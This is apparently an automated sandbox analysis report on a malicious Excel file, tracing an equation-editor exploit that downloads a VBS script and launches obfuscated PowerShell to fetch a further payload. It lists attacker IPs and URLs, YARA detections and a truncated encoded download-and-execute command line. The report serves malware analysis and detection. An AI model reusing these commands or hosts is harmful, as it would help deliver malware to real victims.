Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 12_2_035306A2 URLDownloadToFileW,ShellExecuteW,ExitProcess,

12_2_035306A2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E5F5854.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /d/kmRFs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /images/004/738/994/original/new_image_vbs_updated.jpg?1707769907 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /LEO/Leoloverme.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/kmRFs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee

Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000012.00000002.513167919.0000000000536000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.513548270.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg
Source: rundll32.exe, 00000006.00000002.479489337.0000000000372000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.479489337.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/CLO
Source: CLO on 91.92.244.96.url.4.dr	String found in binary or memory: http://91.92.244.96/LEO/CLO/
Source: P018400.xla.xlsx	String found in binary or memory: http://91.92.244.96/LEO/CLO/microballonu
Source: microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC.url.4.dr	String found in binary or memory: http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdatio
Source: rundll32.exe, 00000006.00000002.479489337.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/CLO3
Source: rundll32.exe, 00000006.00000002.479489337.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/CLO4
Source: rundll32.exe, 00000006.00000002.479489337.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/CLOC:
Source: rundll32.exe, 00000006.00000002.479572774.0000000000574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/CLOME=user-PCComSpec=C:
Source: EQNEDT32.EXE, 0000000C.00000003.490452389.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000002.493175529.0000000000687000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.490452389.0000000000684000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/Leoloverme.vbs
Source: EQNEDT32.EXE, 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/Leoloverme.vbsj
Source: EQNEDT32.EXE, 0000000C.00000002.493175529.0000000000687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/Leoloverme.vbsm
Source: EQNEDT32.EXE, 0000000C.00000002.493175529.000000000065F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.244.96/LEO/Leoloverme.vbsooC:
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: wscript.exe, 0000000D.00000002.497418509.0000000000037000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.497357725.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.497319431.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497551282.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, Leoloverme.vbs.12.dr, Leoloverme[1].vbs.12.dr	String found in binary or memory: http://paste.ee/d/kmRFs
Source: powershell.exe, 00000010.00000002.586909337.00000000027F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.513548270.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.515557442.0000000006430000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000012.00000002.554595769.000000000DA9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/BD_AUTOMCAODataSet1.xsd
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000012.00000002.513548270.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/kmRFs5-V
Source: wscript.exe, 0000000D.00000003.497152572.0000000000714000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.515184952.0000000004D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000012.00000002.513548270.000000000291A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000012.00000002.515184952.0000000004CF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_u
Source: powershell.exe, 00000012.00000002.513167919.0000000000536000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.513548270.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 0000000D.00000002.497567930.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2856, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1700, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: P018400.xla.xlsx	OLE: Microsoft Excel 2007+
Source: ~DF96697D1024044DC5.TMP.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\CLO on 91.92.244.96.url			Jump to behavior

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8420
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8420			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior

Source: P018400.xla.xlsx

OLE indicator, VBA macros: true

Source: P018400.xla.xlsx

Stream path 'MBD000149AE/\x1Ole' : http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doCE@-fBrv}<zF8|QkQe!".C]H!Kh2xbcp=B7]EZQR9d~s8GVUS!(^6)4~|qo2Pq>\1`W)q3KC~>TBhyPwc,RkWhY6v62JtS6ZBbisAnzO3W0VM1XFOXyNEYK7aTnoQ9tdBpiAdMdT3R48Nn3o0JVw7xks7RszCbrnqp62syr{+(VRW}w(&pv

Source: ~DF96697D1024044DC5.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{A088A985-E6D5-4349-B475-13037637E9EB}.tmp.4.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
